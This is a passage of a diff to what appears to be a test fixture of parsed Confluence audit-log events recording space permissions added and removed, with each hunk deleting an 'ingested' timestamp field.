"{\"timestamp\":\"2021-11-23T00:39:37.606Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4663,7 +4615,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837501658Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.596Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4763,7 +4714,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837502553Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.592Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4856,7 +4806,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837503517Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.588Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4956,7 +4905,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837504385Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.584Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5056,7 +5004,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837505428Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.580Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5156,7 +5103,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837506414Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.575Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5249,7 +5195,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837507395Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.571Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5349,7 +5294,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837508361Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.567Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5449,7 +5393,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837509331Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.556Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5549,7 +5492,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837510491Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.454Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5642,7 +5584,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837511356Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.444Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5742,7 +5683,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837512234Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.435Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5842,7 +5782,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837513107Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.424Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5942,7 +5881,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837513980Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.404Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6037,7 +5975,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837514910Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.393Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6125,7 +6062,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837515968Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.375Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6213,7 +6149,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837516934Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.366Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6301,7 +6236,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837517809Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.361Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6389,7 +6323,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837518804Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.357Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6477,7 +6410,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837519722Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.350Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6565,7 +6497,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837520716Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.342Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6646,7 +6577,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837521715Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.330Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6734,7 +6664,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837522678Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.324Z\",\"author\":{\"name\":\"test 